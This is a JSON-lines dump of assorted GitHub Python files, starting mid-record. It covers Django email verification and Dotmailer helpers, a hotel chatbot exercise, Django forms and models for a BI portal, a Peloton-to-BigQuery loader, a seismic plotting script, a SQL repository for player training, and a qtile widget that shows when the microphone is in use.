generate_token(user)\n\n if age is not None and age < 13:\n message = parentsEmailVerificationNeededEmail(request, user, verification.token)\n send_email(VERIFICATION_EMAIL, [user.email], message[\"subject\"], message[\"message\"], message[\"subject\"])\n else:\n message = emailVerificationNeededEmail(request, verification.token)\n send_email(VERIFICATION_EMAIL, [user.email], message[\"subject\"], message[\"message\"], message[\"subject\"])\n\n else: # verifying change of email address.\n verification = generate_token(user, 
new_email)\n\n message = emailChangeVerificationEmail(request, verification.token)\n send_email(VERIFICATION_EMAIL, [user.email], message[\"subject\"], message[\"message\"], message[\"subject\"])\n\n message = emailChangeNotificationEmail(request, new_email)\n send_email(VERIFICATION_EMAIL, [user.email], message[\"subject\"], message[\"message\"], message[\"subject\"])\n\n\ndef is_verified(user):\n \"\"\"Check that a user has verified their email address.\"\"\"\n verifications = user.email_verifications.filter(verified=True)\n return len(verifications) != 0\n\n\ndef add_to_dotmailer(first_name: str, last_name: str, email: str, user_type: DotmailerUserType):\n try:\n create_contact(first_name, last_name, email)\n add_contact_to_address_book(first_name, last_name, email, user_type)\n except RequestException:\n return HttpResponse(status=404)\n\n\ndef create_contact(first_name, last_name, email):\n url = app_settings.DOTMAILER_CREATE_CONTACT_URL\n body = {\n \"contact\": {\n \"email\": email,\n \"optInType\": \"VerifiedDouble\",\n \"emailType\": \"Html\",\n \"dataFields\": [\n {\"key\": \"FIRSTNAME\", \"value\": first_name},\n {\"key\": \"LASTNAME\", \"value\": last_name},\n {\"key\": \"FULLNAME\", \"value\": f\"{first_name} {last_name}\"},\n ],\n },\n \"consentFields\": [{\"fields\": [{\"key\": \"DATETIMECONSENTED\", \"value\": datetime.datetime.now().__str__()}]}],\n \"preferences\": app_settings.DOTMAILER_DEFAULT_PREFERENCES,\n }\n\n post(url, json=body, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n\n\ndef add_contact_to_address_book(first_name: str, last_name: str, email: str, user_type: DotmailerUserType):\n main_address_book_url = app_settings.DOTMAILER_MAIN_ADDRESS_BOOK_URL\n\n body = {\n \"email\": email,\n \"optInType\": \"VerifiedDouble\",\n \"emailType\": \"Html\",\n \"dataFields\": [\n {\"key\": \"FIRSTNAME\", \"value\": first_name},\n {\"key\": \"LASTNAME\", \"value\": last_name},\n {\"key\": \"FULLNAME\", \"value\": f\"{first_name} {last_name}\"},\n ],\n }\n\n post(main_address_book_url, json=body, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n\n specific_address_book_url = app_settings.DOTMAILER_NO_ACCOUNT_ADDRESS_BOOK_URL\n\n if user_type == DotmailerUserType.TEACHER:\n specific_address_book_url = app_settings.DOTMAILER_TEACHER_ADDRESS_BOOK_URL\n elif user_type == DotmailerUserType.STUDENT:\n specific_address_book_url = app_settings.DOTMAILER_STUDENT_ADDRESS_BOOK_URL\n\n post(specific_address_book_url, json=body, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n\n\ndef delete_contact(email: str):\n try:\n user = get_dotmailer_user_by_email(email)\n user_id = user.get(\"id\")\n if user_id:\n url = app_settings.DOTMAILER_DELETE_USER_BY_ID_URL.replace(\"ID\", str(user_id))\n delete(url, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n except RequestException:\n return HttpResponse(status=404)\n\n\ndef get_dotmailer_user_by_email(email):\n url = app_settings.DOTMAILER_GET_USER_BY_EMAIL_URL.replace(\"EMAIL\", email)\n\n response = get(url, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n\n return json.loads(response.content)\n\n\ndef add_consent_record_to_dotmailer_user(user):\n consent_date_time = datetime.datetime.now().__str__()\n\n url = app_settings.DOTMAILER_PUT_CONSENT_DATA_URL.replace(\"USER_ID\", str(user[\"id\"]))\n body = {\n \"contact\": {\n \"email\": user[\"email\"],\n \"optInType\": user[\"optInType\"],\n \"emailType\": user[\"emailType\"],\n 
\"dataFields\": user[\"dataFields\"],\n },\n \"consentFields\": [{\"fields\": [{\"key\": \"DATETIMECONSENTED\", \"value\": consent_date_time}]}],\n }\n\n put(url, json=body, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n\n\ndef send_dotmailer_consent_confirmation_email_to_user(user):\n url = app_settings.DOTMAILER_SEND_CAMPAIGN_URL\n campaign_id = app_settings.DOTMAILER_THANKS_FOR_STAYING_CAMPAIGN_ID\n body = {\"campaignID\": campaign_id, \"contactIds\": [str(user[\"id\"])]}\n\n post(url, json=body, auth=(app_settings.DOTMAILER_USER, app_settings.DOTMAILER_PASSWORD))\n\n\ndef update_indy_email(user, request, data):\n changing_email = False\n new_email = data[\"email\"]\n\n if new_email != \"\" and new_email != user.email:\n changing_email = True\n users_with_email = User.objects.filter(email=new_email)\n # email is already taken\n if users_with_email.exists():\n email_message = emailChangeDuplicateNotificationEmail(request, new_email)\n send_email(\n NOTIFICATION_EMAIL,\n [user.email],\n email_message[\"subject\"],\n email_message[\"message\"],\n email_message[\"subject\"],\n )\n else:\n # new email to set and verify\n send_verification_email(request, user, new_email)\n return changing_email, new_email\n\n\ndef update_email(user: Teacher or Student, request, data):\n changing_email = False\n new_email = data[\"email\"]\n\n if new_email != \"\" and new_email != user.new_user.email:\n changing_email = True\n users_with_email = User.objects.filter(email=new_email)\n # email is already taken\n if users_with_email.exists():\n email_message = emailChangeDuplicateNotificationEmail(request, new_email)\n send_email(\n NOTIFICATION_EMAIL,\n [user.new_user.email],\n email_message[\"subject\"],\n email_message[\"message\"],\n email_message[\"subject\"],\n )\n else:\n # new email to set and verify\n send_verification_email(request, user.new_user, new_email)\n return changing_email, new_email\n","repo_name":"bspindler1/Speed-Demon","sub_path":"venv/lib/python3.8/site-packages/common/helpers/emails.py","file_name":"emails.py","file_ext":"py","file_size_in_byte":9110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26430748810","text":"'''\nFiltering with excluded slots\nNow you're going to put together some of the ideas from previous exercises in\norder to allow users to tell your bot about what they do and do not want,\nsplit across multiple messages.\n\nThe negated_ents() function has already been defined for you. 
Additionally,\na slightly tweaked version of the find_hotels() function, which accepts a\nneg_params dictionary in addition to a params dictionary, has been defined.\n\n'''\n# Define the respond function\ndef respond(message, params, neg_params):\n    # Extract the entities\n    entities = interpreter.parse(message)[\"entities\"]\n    ent_vals = [e[\"value\"] for e in entities]\n    # Look for negated entities\n    negated = negated_ents(message, ent_vals)\n    for ent in entities:\n        if ent[\"value\"] in negated and negated[ent[\"value\"]]:\n            neg_params[ent[\"entity\"]] = str(ent[\"value\"])\n        else:\n            params[ent[\"entity\"]] = str(ent[\"value\"])\n    # Find the hotels\n    results = find_hotels(params, neg_params)\n    names = [r[0] for r in results]\n    n = min(len(results),3)\n    # Return the correct response\n    return responses[n].format(*names), params, neg_params\n\n# Initialize params and neg_params\nparams = {}\nneg_params = {}\n\n# Pass the messages to the bot\nfor message in [\"I want a cheap hotel\", \"but not in the north of town\"]:\n    print(\"USER: {}\".format(message))\n    response, params, neg_params = respond(message, params, neg_params)\n    print(\"BOT: {}\".format(response))\n","repo_name":"kaushalpowar/nlp_learning","sub_path":"filtering_with_Excluded_slots.py","file_name":"filtering_with_Excluded_slots.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18751858677","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.core.mail import BadHeaderError, mail_managers\n\n\nclass ContactForm(forms.Form):\n    email = forms.EmailField(initial='user@yourdomain.org')\n    # force a CharField to be visualized as TextArea on the HTML page\n    text = forms.CharField(widget=forms.Textarea)\n\n    FEEDBACK = 'F'\n    CORRECTION = 'C'\n    SUPPORT = 'S'\n    CHOICE_SELECTED = (\n        (FEEDBACK, 'Feedback'),\n        (CORRECTION, 'Correction'),\n        (SUPPORT, 'Support'),\n    )\n    contact_reason_selector = forms.ChoiceField(\n        choices=CHOICE_SELECTED, initial=FEEDBACK\n    )\n\n    def send_email(self):\n        # Get the (guaranteed) cleaned content of the selector\n        contact_reason = self.cleaned_data.get('contact_reason_selector')\n        # make a dictionary from the CHOICE_SELECTED enumerator\n        contact_reason_dictionary = dict(self.CHOICE_SELECTED)\n        # Get the full information from the selector (not simply the initials 'F', 'C' or 'S')\n        cleaned_selection = contact_reason_dictionary.get(contact_reason)\n        email = self.cleaned_data.get('email')\n        text = self.cleaned_data.get('text')\n        message_body = 'Message from: {}\\n\\n{}'.format(email, text)\n\n        try:\n            mail_managers(cleaned_selection, message_body)\n        except BadHeaderError:\n            self.add_error(None, ValidationError('Could not send the email.\\n'\n                                                 'Extra Headers are not allowed '\n                                                 'in the message body.'))\n            return False\n        else:\n            return True\n","repo_name":"SteelTurtle/django_store","sub_path":"contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12453366242","text":"import math\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils.html import mark_safe\nfrom django.utils.text import Truncator\nfrom taggit.managers import TaggableManager\nfrom django.utils import timezone\nfrom django.utils.html import format_html\n\nfrom PIL import Image\nfrom sorl.thumbnail import get_thumbnail\nfrom sorl.thumbnail 
import ImageField\nfrom markdown import markdown\n\n# references:\n# for sorl.thumbnail: https://sorl-thumbnail.readthedocs.io/en/latest/examples.html\n\nppt_master_choices = [\n ('master1', 'Guardian Master PPT'),\n]\n\n###########################################################################################################\nclass Presentation(models.Model):\n\n name = models.CharField(\n max_length=200,\n # unique=True\n )\n\n description = models.CharField(\n max_length=1000,\n default='',\n blank=True\n )\n\n ppt_file = models.FileField(\n upload_to='exported_pres_ppt/',\n null = True,\n blank = True,\n verbose_name = 'Exported PPT file',\n )\n\n pdf_file = models.FileField(\n upload_to='exported_pres_pdf/',\n null = True,\n blank = True,\n verbose_name = 'Exported PDF file'\n )\n\n ppt_master_file = models.CharField(\n max_length = 20,\n null = True,\n blank = True,\n choices = ppt_master_choices,\n default = 'master1',\n verbose_name = 'PPT Master Layout'\n )\n\n created_by = models.ForeignKey(\n User,\n related_name='creator',\n null = True,\n on_delete=models.CASCADE\n )\n\n updated_by = models.ForeignKey(\n User,\n related_name='updater',\n null = True,\n on_delete=models.CASCADE\n )\n\n created_at = models.DateTimeField(\n editable=False,\n auto_now=True,\n # default=timezone.now()\n )\n\n updated_at = models.DateTimeField(\n auto_now_add=True,\n # default=timezone.now()\n )\n\n active = models.BooleanField(\n default=True\n )\n\n tags = TaggableManager()\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Presentation'\n verbose_name_plural = 'Presentations'\n ordering = [\"-created_at\"]\n\n###########################################################################################################\nclass SnippetHtml(models.Model):\n name = models.CharField(\n max_length=200,\n null = True,\n blank = True,\n verbose_name = 'Title'\n )\n\n htmltext = models.TextField(\n null = True,\n blank = True,\n verbose_name= 'Content'\n )\n\n def get_htmltext_as_markdown(self):\n return mark_safe(markdown(self.htmltext, safe_mode='escape'))\n\n # return mark_safe(self.htmltext)\n # return htmltext\n\n get_htmltext_as_markdown.short_description = 'Content preview'\n\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'HTML Text'\n verbose_name_plural = 'HTML Texts'\n\n###########################################################################################################\nclass Snippet(models.Model):\n name = models.CharField(\n max_length=50,\n blank=True\n )\n\n # embedded = models.TextField(\n embedded = models.CharField(\n max_length=2000,\n blank=True\n )\n\n # file will be uploaded to MEDIA_ROOT/image_rendered\n image_rendered = models.ImageField(\n upload_to='image_rendered/',\n verbose_name='Rendered Report',\n null = True,\n blank = True\n )\n\n # using sorl.thumbnail.ImageField\n image_cropped = ImageField(\n upload_to='image_cropped/',\n verbose_name='Report Snippet',\n null = True,\n blank = True\n )\n\n # @property\n def render_button(self):\n html = \"\"\"\n \n \"\"\"\n return mark_safe(html)\n\n render_button.short_description = ''\n\n x = models.FloatField(\n default=0\n )\n\n y = models.FloatField(\n default=0\n )\n\n w = models.FloatField(\n default=0\n )\n\n h = models.FloatField(\n default=0\n )\n\n created_at = models.DateTimeField(\n editable=False,\n auto_now=True,\n )\n\n updated_at = models.DateTimeField(\n auto_now_add=True,\n )\n\n created_by = models.ForeignKey(\n User,\n related_name='snippet_creator',\n null = 
True,\n on_delete=models.CASCADE\n )\n\n updated_by = models.ForeignKey(\n User,\n related_name='snippet_updater',\n null = True,\n on_delete=models.CASCADE\n )\n\n # will be available as bipage.pages_set and snippet.bipages\n # pages = models.ManyToManyField(Bipage)\n\n tags = TaggableManager(\n blank = True\n )\n\n def __str__(self):\n return self.name\n\n # overwritting save\n def save(self, *args, **kwargs):\n super().save(*args, **kwargs)\n # img = Image.open(self.image_cropped.path)\n # output_size = (125, 125)\n # img.thumbnail(output_size)\n # img.save(self.image.path)\n\n\n class Meta:\n verbose_name = 'snippet'\n verbose_name_plural = 'snippets'\n\n###########################################################################################################\nppt_page_layout_choices = [\n ('header', 'Header Page'),\n ('content1', 'Content With 1 Placeholder'),\n ('content2', 'Content With 2 Columns'),\n]\nclass Bipage(models.Model):\n\n name = models.CharField(\n max_length=100,\n null = True,\n blank = True,\n verbose_name = 'Internal name'\n )\n\n title = models.CharField(\n max_length=200,\n null = True,\n blank = True,\n verbose_name = 'Title'\n )\n\n subtitle = models.CharField(\n max_length=200,\n null = True,\n blank = True,\n verbose_name = 'Subtitle'\n )\n\n snippets = models.ManyToManyField(\n Snippet,\n # null = True,\n blank = True,\n )\n\n texts = models.ManyToManyField(\n SnippetHtml,\n # null = True,\n blank = True,\n\n )\n\n ppt_file = models.FileField(\n upload_to='exported_pages_ppt/',\n null = True,\n blank = True,\n verbose_name = 'Exported PPT file'\n )\n\n pdf_file = models.FileField(\n upload_to='exported_pages_pdf/',\n null = True,\n blank = True,\n verbose_name = 'Exported PDF file',\n )\n\n ppt_page_layout = models.CharField(\n max_length = 200,\n null = True,\n blank = True,\n choices = ppt_page_layout_choices,\n default = 'content1',\n verbose_name = 'PPT Page Layout'\n )\n\n presentation = models.ForeignKey(\n Presentation,\n related_name='presentations',\n on_delete=models.CASCADE\n )\n\n last_updated = models.DateTimeField(\n auto_now_add=True\n )\n\n\n def page_preview(self):\n html = \"\"\"\n \n \"\"\".format(self.pk)\n\n return mark_safe(html)\n\n page_preview.short_description = ''\n\n def layout_preview(self):\n\n html = \"\"\"\n \n \"\"\".format(self.ppt_page_layout)\n\n return mark_safe(html)\n\n layout_preview.short_description = ''\n\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name = 'BI Page'\n verbose_name_plural = 'BI Pages'\n\n","repo_name":"cburke8/bi-portal","sub_path":"mainsite/biportal/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28187757112","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nimport os\n\nfrom google.cloud import bigquery\nfrom google.cloud import secretmanager\nimport pandas as pd\n\nimport log\nimport peloton_instructor\nimport peloton_user\nimport peloton_ride\nimport peloton_workout\n\nUSERNAME=os.environ['USERNAME']\nGCP_PROJECT_ID=os.environ['GCP_PROJECT_ID']\nSECRET_MANAGER=os.environ['SECRET_MANAGER']\nBIGQUERY_DATASET=os.environ['BIGQUERY_DATASET']\n\n# configure logging\nlogger = log.setup_custom_logger('peloton')\n\n# initialize bigquery\nclient = bigquery.Client()\n\n# initalize secret manager and access secret\nmanager = secretmanager.SecretManagerServiceClient()\nname = 
manager.secret_version_path(GCP_PROJECT_ID, SECRET_MANAGER, 'latest')\nresponse = manager.access_secret_version(name)\nPASSWORD = response.payload.data.decode('UTF-8')\n\n# %% [markdown]\n# # Users\n# In the section below we create the Peloton user, authenticate with the API, and send user data to a table in BigQuery.\n\n# %%\n\nuser = peloton_user.PelotonUser(USERNAME, PASSWORD)\n\n\n# %%\ntable_id = f'{GCP_PROJECT_ID}.{BIGQUERY_DATASET}.users'\n\njob = client.load_table_from_dataframe(user.to_df(), table_id, job_config=user.get_bigquery_job_config())\n\njob.result()\n\n# %% [markdown]\n# # Workouts\n# Here we retrieve all workout ids for the user, workout metadata, performance graphs that include heart rate data, and send to a table in BigQuery.\n\n# %%\n# retrieve all workout ids\nworkout_ids = user.get_workout_ids()\n\n# create workout objects\nworkouts = [peloton_workout.PelotonWorkout(user, workout_id) for workout_id in workout_ids]\n\n# get workout summaries\nsummaries = [workout.get_workout_summary() for workout in workouts]\n\n# get workout details\ndetails = [workout.get_workout_details() for workout in workouts]\n\n\n# %%\n# send workout data to BigQuery\n\ntable_id = f'{GCP_PROJECT_ID}.{BIGQUERY_DATASET}.workouts'\n\npayload = pd.concat([workout.to_df() for workout in workouts])\n\njob = client.load_table_from_dataframe(payload, table_id, job_config=workouts[0].get_bigquery_job_config())\n\njob.result()\n\n\n# %%\n# send performance graph data to BigQuery\n\n# table_id = f'{BIGQUERY_DATASET}.performance_graphs'\n\n# job_config = bigquery.LoadJobConfig(\n# schema=[\n# bigquery.SchemaField('workout_id', 'STRING'),\n# bigquery.SchemaField('display_name', 'STRING'),\n# bigquery.SchemaField('range', 'STRING'),\n# bigquery.SchemaField('minimum_value', 'INTEGER'),\n# bigquery.SchemaField('maximum_value', 'INTEGER'),\n# bigquery.SchemaField('duration_seconds', 'INTEGER'),\n# ],\n# write_disposition='WRITE_TRUNCATE'\n# )\n\n# job = client.load_table_from_dataframe(performance_graph_df, table_id, job_config=job_config)\n\n# job.result()\n\n# %% [markdown]\n# # Rides\n# Here we retrieve class data for the class taken during the workout.\n\n# %%\n# pull rides data for list of unique ride ids\nride_ids = [workout.ride_id for workout in workouts]\nunique_ride_ids = list(dict.fromkeys(ride_ids))\n\n# create objects\nrides = [peloton_ride.PelotonRide(user, ride_id) for ride_id in unique_ride_ids]\n\n# fetch all possible ride types\nride_types = rides[0].get_ride_types()\n\nfor ride in rides:\n ride_type = next((ride_type for ride_type in ride_types if ride_type['id'] == ride.ride_type_id), None)\n ride.ride_type_display_name = ride_type['display_name']\n\n\n# %%\ntable_id = f'{GCP_PROJECT_ID}.{BIGQUERY_DATASET}.rides'\n\npayload = pd.concat([ride.to_df() for ride in rides])\n\njob = client.load_table_from_dataframe(payload, table_id, job_config=rides[0].get_bigquery_job_config())\n\njob.result()\n\n# %% [markdown]\n# # Instructors\n\n# %%\ninstructor_ids = [ride.instructor_id for ride in rides]\nunique_instructor_ids = list(dict.fromkeys(instructor_ids))\n\ninstructors = [peloton_instructor.PelotonInstructor(instructor_id) for instructor_id in unique_instructor_ids if instructor_id is not None]\n\n\n# %%\ntable_id = f'{GCP_PROJECT_ID}.{BIGQUERY_DATASET}.instructors'\n\npayload = pd.concat([instructor.to_df() for instructor in instructors])\n\njob = client.load_table_from_dataframe(payload, table_id, job_config=instructors[0].get_bigquery_job_config())\n\njob.result()\n\n\n# 
%%\n\n\n\n","repo_name":"xmarcosx/peloton","sub_path":"peloton/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"4937923104","text":"\n\"\"\"\n2D bars for binned events\n------------------------------------------\nThis is an example of plotting event count with binned stacking by back-azimuth and ray-parameters.\n\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colorbar import ColorbarBase\nfrom matplotlib.colors import Normalize\nfrom obspy.imaging.cm import get_cmap\n\ndef plot(evts_file='data/binned_evts.txt'):\n evts_stack = np.loadtxt(evts_file)\n cmap = get_cmap('YlGnBu')\n dh = 0.004\n dww = 30\n rayp_bins = np.arange(0.04, 0.08+dh, dh).astype(float)\n baz_bins = np.arange(0., 360.+dww, dww).astype(float)+15\n N = baz_bins.size\n dw = np.mean(np.diff(np.linspace(0, 2*np.pi, N)))\n N -= 1\n N2 = rayp_bins.size\n N2 -= 1\n hist = np.zeros([N, N2])\n for i, evt in enumerate(evts_stack):\n idx_ba = np.where(baz_bins == evt[0])[0]\n idx_ra = np.where((rayp_bins > evt[1]-0.0005) & (rayp_bins < evt[1]+0.0005))[0]\n hist[idx_ba, idx_ra] = evt[2]\n fig = plt.figure(figsize=(7, 7))\n cax = fig.add_axes([0.1, 0.15, 0.05, 0.5])\n ax = fig.add_axes([0.30, 0.1, 0.6, 0.6], polar=True)\n ax.set_theta_direction(-1)\n ax.set_theta_zero_location(\"N\")\n for i, row in enumerate(hist):\n bars = ax.bar(x=(i * dw) * np.ones(N2)+2*np.pi*15/360,\n height=dh * np.ones(N2),\n width=dw, bottom=dh * np.arange(N2)+0.04,\n color=cmap(row / hist.max()))\n ax.set_xticks(np.arange(0, 2*np.pi, 2*np.pi*30/360))\n ax.set_xticklabels(['{}$^\\circ$'.format(v) for v in np.arange(0, 360, 30)])\n ax.set_ylim(0.036, 0.08)\n ax.set_yticks(rayp_bins)\n [i.set_color('grey') for i in ax.get_yticklabels()]\n ax.set_rlabel_position(230)\n ColorbarBase(cax, cmap=cmap,\n norm=Normalize(vmin=hist.min(), vmax=hist.max()))\n cax.set_ylabel('Number of PRFs')\n cax.grid(axis='y')\n plt.show()\n\n\nif __name__ == '__main__':\n plot()\n","repo_name":"xumi1993/docs.post","sub_path":"source/examples/matplotlib/evts_stack.py","file_name":"evts_stack.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"852165586","text":"import torch\n\nfrom textwrap import fill\nfrom IPython.display import Markdown, display\n\nfrom langchain.prompts.chat import (\n ChatPromptTemplate,\n HumanMessagePromptTemplate,\n SystemMessagePromptTemplate,\n )\n\nfrom langchain import PromptTemplate\nfrom langchain import HuggingFacePipeline\n\nfrom langchain.document_loaders import PyMuPDFLoader\nfrom langchain.vectorstores import Chroma\nfrom langchain.schema import AIMessage, HumanMessage\nfrom langchain.memory import ConversationBufferMemory\nfrom langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\nfrom langchain.document_loaders import UnstructuredMarkdownLoader, UnstructuredURLLoader\nfrom langchain.chains import LLMChain, SimpleSequentialChain, RetrievalQA, ConversationalRetrievalChain\n\nfrom transformers import BitsAndBytesConfig, AutoModelForCausalLM, AutoTokenizer, GenerationConfig, pipeline\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nMODEL_NAME = \"mistralai/Mistral-7B-Instruct-v0.1\"\n\nquantization_config = BitsAndBytesConfig(\n load_in_4bit=True,\n bnb_4bit_compute_dtype=torch.float16,\n 
bnb_4bit_quant_type=\"nf4\",\n bnb_4bit_use_double_quant=True,\n)\n\ntokenizer = AutoTokenizer.from_pretrained(MODEL_NAME, use_fast=True)\ntokenizer.pad_token = tokenizer.eos_token\n\nmodel = AutoModelForCausalLM.from_pretrained(\n MODEL_NAME, torch_dtype=torch.float16,\n trust_remote_code=True,\n device_map=\"auto\",\n quantization_config=quantization_config\n)\n\ngeneration_config = GenerationConfig.from_pretrained(MODEL_NAME)\ngeneration_config.max_new_tokens = 1024\ngeneration_config.temperature = 0.0001\ngeneration_config.top_p = 0.95\ngeneration_config.do_sample = True\ngeneration_config.repetition_penalty = 1.15\n\npipeline = pipeline(\n \"text-generation\",\n model=model,\n tokenizer=tokenizer,\n return_full_text=True,\n generation_config=generation_config,\n)\n\nllm = HuggingFacePipeline(\n pipeline=pipeline,\n)\n\npdfLoader = PyMuPDFLoader('../documents/apple-10-k.pdf')\ndocuments = pdfLoader.load()\n\ntext_splitter = RecursiveCharacterTextSplitter(chunk_size=2000, chunk_overlap=500)\ntexts_chunks = text_splitter.split_documents(documents)\n\n# embeddings = HuggingFaceEmbeddings(model_name='sentence-transformers/all-MiniLM-L6-v2',\n# model_kwargs={'device': 'cpu'})\n\ndb = Chroma.from_documents(texts_chunks, HuggingFaceEmbeddings(), persist_directory=\"db\")\n\n# template = \"\"\"\n# [INST] <>\n# Act as an assistant. Use the following information to answer the question at the end.\n# <>\n\n# {context}\n\n# {question} [/INST]\n# \"\"\"\n\ntemplate = \"\"\"Use the following pieces of information to answer the user's question.\nIf you don't know the answer, just say that you don't know, don't try to make up an answer.\nContext: {context}\nQuestion: {question}\nOnly return the helpful answer regarding user question.\nHelpful answer:\n\"\"\"\n\nprompt = PromptTemplate(template=template, input_variables=[\"context\", \"question\"])\n\nqa_chain = RetrievalQA.from_chain_type(\n llm=llm,\n chain_type=\"stuff\",\n retriever=db.as_retriever(search_kwargs={\"k\": 2}),\n return_source_documents=True,\n chain_type_kwargs={\"prompt\": prompt},\n)\n\n\nquery = \"Is there any legal proceedings? If yes, what companies are they related to?\"\nresult_ = qa_chain(\n query\n)\nresult = result_[\"result\"].strip()\n\n\nprint(f\"{query}\")\nprint(f\"
{result}
\")","repo_name":"dawidkubicki/rag-applications","sub_path":"mistral_chromadb/normal_with_quantization_config_model.py","file_name":"normal_with_quantization_config_model.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4823799944","text":"\n# file = open('test','w',encoding='utf-8')\n#\n# file.write('111\\n')\n# file.write('aaa\\n')\n#\n# file.close()\n#\n# with open('test','a',encoding='utf-8') as f:\n# f.write('dad')\n# f.write('mom')\n# f.write('child')\n\n# with open('fileoperation.py','r',encoding='utf-8') as fo:\n# data = fo.read()\n# print(data)\n\n# fb = open('fileoperation.py','rb')\n# data = fb.read()\n# print(data.decode('utf-8'))\n\nfb = open('test','ab')\nfb.write('\\nMR.SherLock'.encode('utf-8'))\nfb.write(bytes('\\nMRS.DOCTOR',encoding='utf-8'))\nfb.close()","repo_name":"huotong1212/mylearnpy","sub_path":"code/day01/fileoperation.py","file_name":"fileoperation.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73054003894","text":"from db.run_sql import run_sql\n\nfrom models.player import Player\nfrom models.training import Training\nfrom models.player_training import Player_Training\n\nimport repositories.player_repository as player_repository\nimport repositories.training_repository as training_repository\nimport repositories.player_training_repository as player_training_repository\n\ndef save(player_training):\n sql = \"INSERT INTO players_trainings (player_id, training_id, comments) VALUES (%s, %s, %s) RETURNING id\"\n values = [player_training.player.id, player_training.training.id, player_training.comments]\n results = run_sql (sql, values)\n player_training.id = results [0]['id']\n return player_training\n\ndef select(id):\n player_training = None\n sql = \"SELECT * FROM players_trainings WHERE id = %s\"\n values = [id]\n result = run_sql(sql, values)[0]\n \n if result is not None:\n player_training = Player_Training(result['player_id'], result['training_id'], result['comments'])\n return player_training\n\ndef select_all():\n player_trainings = []\n \n sql = 'SELECT * FROM players_trainings'\n results = run_sql(sql)\n \n for row in results:\n player = player_repository.select(row['player_id'])\n training = training_repository.select(row['training_id'])\n player_training = Player_Training(player, training, row['comments'], row['id'])\n player_trainings.append(player_training)\n return player_trainings\n\ndef training(player_training):\n sql = 'SELECT * FROM trainings WHERE id = %s'\n values = [player_training.training.id]\n results = run_sql(sql, values)[0]\n training = Training(results['training_name'], results['time'], results['duration'], results['intensity'], results['id'])\n\n return training\n\ndef player(player_training):\n sql = 'SELECT * FROM players WHERE id = %s'\n values = [player_training.player.id]\n results = run_sql(sql, values)[0]\n player = Player(results['name'], results['shirt_no'], results['position'], results['fatigue'], results['id'])\n return player\n\ndef delete_all():\n sql = \"DELETE FROM players_trainings\"\n run_sql(sql)\n \ndef delete(id):\n sql = \"DELETE FROM players_trainings WHERE id = %s\"\n values =[id]\n run_sql(sql, values)\n\ndef raise_fatigue(id):\n sql = \"UPDATE players SET fatigue = %s WHERE id = %s\"\n values = [player.fatigue, player.id]\n run_sql(sql, 
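        # run_sql binds each %s placeholder in the statement to the matching
        # entry of this values list (psycopg2-style parameters), so ids and
        # numbers are never string-formatted into the SQL text. A hedged
        # sketch of the same pattern on a bare psycopg2 connection `conn`
        # (hypothetical name, not part of this module) would be:
        #   with conn.cursor() as cur:
        #       cur.execute("UPDATE players SET fatigue = %s WHERE id = %s",
        #                   [player.fatigue, player.id])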
values)","repo_name":"dieeer/armory","sub_path":"repositories/player_training_repository.py","file_name":"player_training_repository.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33194535752","text":"import logging\n\nimport pulsectl\n\nfrom taqtile.widgets.togglebtn import ToggleButton\nfrom libqtile import hook\nfrom pprint import pformat\nfrom libqtile import qtile\n\nlogger = logging.getLogger(__name__)\n\n\nclass VoiceInputStatusWidget(ToggleButton):\n def _check_state(self):\n found = False\n with pulsectl.Pulse(\"voice-input-status-widget\") as pulse:\n # Get a list of all source outputs (recording streams)\n source_outputs = pulse.source_output_list()\n sources = pulse.source_list()\n\n # Create a dictionary of sources with their index as the key\n sources_dict = {source.index: source for source in sources}\n\n # Print information about each source output with an active parent source\n for source_output in source_outputs:\n parent_source = sources_dict.get(source_output.source)\n\n if parent_source and parent_source.state == \"running\":\n app_name = source_output.proplist.get(\n \"application.name\", \"Unknown\"\n )\n app_id = source_output.proplist.get(\n \"application.id\", \"Unknown\"\n )\n if app_id == \"org.PulseAudio.pavucontrol\":\n continue\n return True\n\n # print(f\"App name: {app_name}\")\n # print(f\"Source output index: {source_output.index}\")\n # print(f\"Source index: {source_output.source}\")\n # print(f\"Volume: {source_output.volume}\")\n # print(f\"Mute: {source_output.mute}\")\n # print(f\"Sample spec: {source_output.sample_spec}\")\n # print(f\"Proplist: 